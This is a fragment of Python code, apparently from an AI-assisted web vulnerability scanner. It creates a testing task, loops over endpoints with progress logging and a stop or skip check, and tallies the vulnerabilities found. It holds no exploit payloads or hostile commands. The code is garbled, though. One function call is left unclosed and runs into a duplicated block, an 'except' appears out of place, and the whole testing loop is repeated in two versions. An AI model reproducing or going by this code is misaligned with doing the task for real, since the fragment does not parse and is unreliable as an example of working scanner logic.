await self.db.commit()
# Create vulnerability testing task
vuln_testing_task = await self._create_agent_task(
scan_id=scan_id,
task_type="testing",
task_name="Vulnerability Testing",
description=f"Testing {len(endpoints)} endpoints for {len(testing_plan.vulnerability_types)} vulnerability types",
tool_name="dynamic_vuln_engine",
tool_category="scanner"
)
await ws_manager.broadcast_log(scan_id, "info", f"Testing {len(endpoints)} endpoints for {len(testing_plan.vulnerability_types)} vuln types")
await ws_manager.broadcast_log(scan_id, "info", "")
try:
# Test endpoints with AI-determined vulnerabilities
total_endpoints = len(endpoints)
endpoints_tested = 0
vulns_before = scan.total_vulnerabilities
async with DynamicVulnerabilityEngine() as engine:
for i, endpoint in enumerate(endpoints):
if self._stop_requested:
break
progress = 45 + int((i / total_endpoints) * 45)
await ws_manager.broadcast_progress(
scan_id, progress,
f"Testing {i+1}/{total_endpoints}: {endpoint.path or endpoint.url[:50]}"
)
# Log what we're testing
await ws_manager.broadcast_log(scan_id, "debug", f"[{i+1}/{total_endpoints}] Testing: {endpoint.url[:80]}")
await self._test_endpoint_with_ai(
scan=scan,
endpoint=endpoint,
testing_plan=testing_plan,
engine=engine,
recon_data=recon_data
)
endpoints_tested += 1
# Update final counts
await self._update_vulnerability_counts(scan)
vulns_found = scan.total_vulnerabilities - vulns_before
await self._complete_agent_task(
vuln_testing_task,
items_processed=endpoints_tested,
items_found=vulns_found,
summary=f"Tested {endpoints_tested} endpoints, found {vulns_found} vulnerabilities"
# Create vulnerability testing task
vuln_testing_task = await self._create_agent_task(
scan_id=scan_id,
task_type="testing",
task_name="Vulnerability Testing",
description=f"Testing {len(endpoints)} endpoints for {len(testing_plan.vulnerability_types)} vulnerability types",
tool_name="dynamic_vuln_engine",
tool_category="scanner"
)
except Exception as e:
await self._fail_agent_task(vuln_testing_task, str(e))
raise
try:
# Test endpoints with AI-determined vulnerabilities
total_endpoints = len(endpoints)
endpoints_tested = 0
vulns_before = scan.total_vulnerabilities
# Check for mid-phase skip signal
skip_now = self._should_skip_phase(scan_id, "testing")
if skip_now:
self._stop_requested = True
async with DynamicVulnerabilityEngine() as engine:
for i, endpoint in enumerate(endpoints):
if self._stop_requested:
break
# Check for skip signal during testing loop
skip_now = self._should_skip_phase(scan_id, "testing")
if skip_now:
await ws_manager.broadcast_log(scan_id, "warning", ">> Phase skip requested - finishing testing early")
break
progress = 45 + int((i / total_endpoints) * 45)
await ws_manager.broadcast_progress(
scan_id, progress,
f"Testing {i+1}/{total_endpoints}: {endpoint.path or endpoint.url[:50]}"
)
# Log what we're testing
await ws_manager.broadcast_log(scan_id, "debug", f"[{i+1}/{total_endpoints}] Testing: {endpoint.url[:80]}")
await self._test_endpoint_with_ai(
scan=scan,
endpoint=endpoint,
testing_plan=testing_plan,
engine=engine,
recon_data=recon_data
)
endpoints_tested += 1
# Update final counts
await self._update_vulnerability_counts(scan)
vulns_found = scan.total_vulnerabilities - vulns_before
await self._complete_agent_task(
vuln_testing_task,
items_processed=endpoints_tested,
items_found=vulns_found,
summary=f"Tested {endpoints_tested} endpoints, found {vulns_found} vulnerabilities"
)
except Exception as e:
await self._fail_agent_task(vuln_testing_task, str(e))
raise
# Phase 4: Complete
scan.status = "completed"